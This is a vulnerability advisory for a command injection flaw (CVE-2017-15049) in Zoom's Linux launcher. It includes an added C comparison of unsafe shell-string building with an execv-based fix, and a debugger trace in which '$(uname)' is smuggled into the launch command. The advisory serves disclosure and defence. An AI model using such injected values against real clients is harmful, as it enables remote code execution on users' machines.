[CONVISO-17-003] - Zoom Linux Client Command Injection Vulnerability (RCE)


1. Advisory Information 
Conviso Advisory ID: CONVISO-17-003 
CVE ID: CVE-2017-15049 
CVSS v2: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Date: 2017-10-01 


2. Affected Components 
Zoom client for Linux, version 2.0.106600.0904 (zoom_amd64.deb). Other versions may be vulnerable.


3. Description 
The binary /opt/zoom/ZoomLauncher is vulnerable to command injection because it uses user input
to construct a shell command without proper sanitization.
The client registers a scheme handler (zoommtg://), which makes it possible to trigger the
vulnerability remotely.
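
The pattern described above, next to a launch that does not involve a shell, as an added example (not Conviso's or Zoom's code). The function names, the shortened command prefix and the use of /bin/echo as a stand-in for the launched binary are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Vulnerable pattern (string is built only, never executed here): the
 * argument is pasted into text meant for a shell, so $(...) inside the
 * double quotes would be expanded by that shell. Prefix is constructed. */
int build_shell_cmd(const char *prog, const char *arg, char *out, size_t n) {
    int len = snprintf(out, n, "export LD_LIBRARY_PATH=/opt/zoom; %s \"%s\"", prog, arg);
    return (len >= 0 && (size_t)len < n) ? 0 : -1;
}

/* Hardened form: no shell. The argument is a single argv entry handed to
 * execv(), so shell metacharacters are ordinary bytes. Captures the
 * child's stdout in out; returns its exit status, or -1 on error. */
int run_no_shell(const char *prog, const char *arg, char *out, size_t n) {
    int fds[2];
    if (n == 0 || pipe(fds) < 0) return -1;
    pid_t pid = fork();
    if (pid < 0) { close(fds[0]); close(fds[1]); return -1; }
    if (pid == 0) {                      /* child: stdout -> pipe, then exec */
        dup2(fds[1], STDOUT_FILENO);
        close(fds[0]); close(fds[1]);
        char *const argv[] = { (char *)prog, (char *)arg, NULL };
        execv(prog, argv);
        _exit(127);                      /* reached only if execv failed */
    }
    close(fds[1]);
    size_t used = 0; ssize_t r;
    while (used < n - 1 && (r = read(fds[0], out + used, n - 1 - used)) > 0)
        used += (size_t)r;
    out[used] = '\0';
    close(fds[0]);
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    char cmd[256], got[64];
    build_shell_cmd("/bin/echo", "$(uname)", cmd, sizeof cmd);
    printf("shell string : %s\n", cmd);   /* substitution survives intact */
    run_no_shell("/bin/echo", "$(uname)", got, sizeof got);
    printf("execv output : %s", got);     /* argument arrives as literal text */
    return 0;
}
```

Environment variables that the shell string sets with export would be set with setenv() in the child before execv() in the hardened form.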


4. Details 
gef> r '$(uname)'
Starting program: /opt/zoom/ZoomLauncher '$(uname)'
ZoomLauncher started.
cmd line: $(uname)
$HOME = /home/user

Breakpoint 5, 0x0000000000401e1f in startZoom(char*, char*) ()
gef> x/3i $pc
=> 0x401e1f <_Z9startZoomPcS_+744>: call 0x4010f0 <strcat@plt>
   0x401e24 <_Z9startZoomPcS_+749>: lea rax,[rbp-0x1420]
   0x401e2b <_Z9startZoomPcS_+756>: mov rcx,0xffffffffffffffff
gef> x/s $rdi
0x7fffffffdf10: "export SSB_HOME=/home/user/.zoom; export QSG_INFO=1; export LD_LIBRARY_PATH=/opt/zoom; /opt/zoom/zoom \""
gef> x/s $rsi
0x7fffffffa750: "$(uname)"
gef> c
Continuing.


